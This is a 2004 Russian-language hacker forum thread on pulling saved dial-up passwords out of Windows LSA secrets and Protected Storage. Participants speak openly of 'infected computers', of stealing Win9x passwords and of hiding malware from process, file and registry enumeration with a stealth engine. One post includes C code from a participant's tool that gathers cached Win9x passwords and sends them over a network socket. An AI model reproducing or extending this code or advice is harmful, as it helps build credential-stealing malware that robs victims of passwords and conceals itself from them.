А у тебя заработало? Там вроде грязный хак, завязаный на поиск кода в процессе... На разных версиях может не работать.29.09.04 09:29 Автор: HandleX <Александр М.> Статус: The Elderman
RetrieveLSASecrets возвращает данные из Protected Storage по ключу L$_RasDefaultCredentials#0 в этом клуче хранятся пароли сохранёные для всех пользователей, поля в Data разделены по 0x00
пароли для каждого пользователя в одельнасти хранятся по ключу
RasDialParams!S-1-5-21-1454471165-113007714-1708537768-1003#0
где S-1-5-21-1454471165-113007714-1708537768-1003 идентефикатор пользователля
и вот ещё вопрос к публике как получить лист таких ид по всем пользователям ???
PS примного блогодарен hello_world за ценный линк :-))
> пароли для каждого пользователя в одельнасти хранятся по > ключу > RasDialParams!S-1-5-21-1454471165-113007714-1708537768-1003 > #0 > где S-1-5-21-1454471165-113007714-1708537768-1003 > идентефикатор пользователля > > и вот ещё вопрос к публике как получить лист таких ид по > всем пользователям ???
> да заработало, хотя надо ещё покавырятся > когда полнастю разберусь скину код
Ну раз уж ты взялся за это дело, то найди где еще в виндах (кроме RASENTRY) можно прописать телефон, а то у меня с половины зараженных компов телефоны не приходят.
Еще неплохо бы предусмотреть кражу паролей в Win9x и невидимость в Process32Next/FindNextFile/RegEnumValues (если надо, могу дать тебе свой стелс-движок).
Я бы сам взялся, но сейчас я пишу свою вещь, да еще эта @$#ная работа...
Вобщем если ты это сделаешь, многие будут благодарны :)
нащёт телефонов начиная с NT 4 получить можно от суда...29.09.04 18:34 Автор: Tamas Статус: Member
> > да заработало, хотя надо ещё покавырятся > > когда полнастю разберусь скину код > > Ну раз уж ты взялся за это дело, то найди где еще в виндах > (кроме RASENTRY) можно прописать телефон, а то у меня с > половины зараженных компов телефоны не приходят. > Еще неплохо бы предусмотреть кражу паролей в Win9x и > невидимость в Process32Next/FindNextFile/RegEnumValues > (если надо, могу дать тебе свой стелс-движок). > > Я бы сам взялся, но сейчас я пишу свою вещь, да еще эта > @$#ная работа... > Вобщем если ты это сделаешь, многие будут благодарны :)
нащёт телефонов начиная с NT 4 получить можно от суда RasGetEntryProperties
win9x от суда RasGetEntryDialParams
а вобше win 5.x С:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk
Process32Next это конечьно хорошо но не каких реальных идей уменя пока нет
нащёт win9x тут всё старо как мир вот кусок кода из моеё софтины
bool GetPwl(SOCKET Socket)
{
int index;
unsigned char buf[4096];
if(OsVerInfo.dwPlatformId==1)
{
if(GetCachePasswords())
{
strcpy(buf,"\r\nThe system passwords\r\n\r\n");
send(Socket,buf,strlen(buf),0);
for(index=0;index<cacheindex;++index)
{
wsprintf(buf,"Resource %s\r\nPassword \"%s\"\r\n",cacheres[index],cachepass[index]);
send(Socket,buf,strlen(buf),0);
}
}
else
{
return false;
}
}
else
{
wsprintf(buf,"\r\nSorry function is not support in system");
send(Socket,buf,strlen(buf),0);
}
return true;
}
bool CALLBACK PassEntry(LPPASSWORD_CACHE_ENTRY p,unsigned long temp)
{
memcpy(cacheres[cacheindex],p->abResource,p->cbResource);
memcpy(cachepass[cacheindex],p->abResource+p->cbResource,p->cbPassword);
szPhoneNumber
Specifies a string that contains an overriding phone number. An empty string ("") indicates that the phone-book entry's phone number should be used. If szEntryName is "", szPhoneNumber cannot be "".
Движок завтра вывешу.
Уточни, plz. Получение паролей откуда? Может тебя интересует генерирование паролей для последующей раздачи пользователям?27.09.04 16:17 Автор: Den <Денис Т.> Статус: The Elderman
> Дык вот в XP с этим "проблема" — вернее, их можно вытащить, > но... точно таким же макаром, как и пароли, запоминаемые XP > при брожении по Интернету. > > Пароли на DiulUp хранятся в ProtectedStorage, им рулятся, и > так просто не выдёргиваются. > > Я слышал, что это как-то можно. Но не так просто, как > раньше, через функции RAS.
вобше всё ведёт суда
c:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk
тут хранятся настройки всех соединений, но паролей там нет, но зато есть вот такая строчька
Guid=CCDD23FDC6EE25499A1B0132E22D6DDB
как это понимать это какой то указатель ?
Копать отсюда и до обеда:27.09.04 20:28 Автор: Killer{R} <Dmitry> Статус: Elderman Отредактировано 27.09.04 20:30 Количество правок: 1
Я както из любопытсва хотел туда сунуться но минимум инфы на сайте мс про интерфейс IPStore и отсутствие хедеров с объявленными интерфейсами и структурами вкупе с природной ленью заставили забить на это дело.
Самое интересное что в дереве онлайнового мсдна описание интерфейса PStore теперь Unavailable - как это понимать хз.. Возможно решили спрятать от посторонних глаз от греха подальше Ж)
Кроме того из
http://forums.mozillazine.org/viewtopic.php?t=70783 Можно заключить то что гдето в дербях сырцов firefox есть нужные вещи.
Вроде имеются утилиты которые делают это. Можно попробовать их дизасмить.
ЗЫ Если чего откопаешь поделись, если не жалко будет. Родина тебя не забудет Ж)
дезасемблинуй вот это...27.09.04 21:08 Автор: Tamas Статус: Member
> http://search.microsoft.com/search/results.aspx?qu=pstore&V > iew=msdn&st=b&c=0&s=1&swc=0 > > Я както из любопытсва хотел туда сунуться но минимум инфы > на сайте мс про интерфейс IPStore и отсутствие хедеров с > объявленными интерфейсами и структурами вкупе с природной > ленью заставили забить на это дело. > Самое интересное что в дереве онлайнового мсдна описание > интерфейса PStore теперь Unavailable - как это понимать > хз.. Возможно решили спрятать от посторонних глаз от греха > подальше Ж) > Кроме того из > http://forums.mozillazine.org/viewtopic.php?t=70783 > Можно заключить то что гдето в дербях сырцов firefox есть > нужные вещи. > Вроде имеются утилиты которые делают это. Можно попробовать > их дизасмить. > > ЗЫ Если чего откопаешь поделись, если не жалко будет. > Родина тебя не забудет Ж)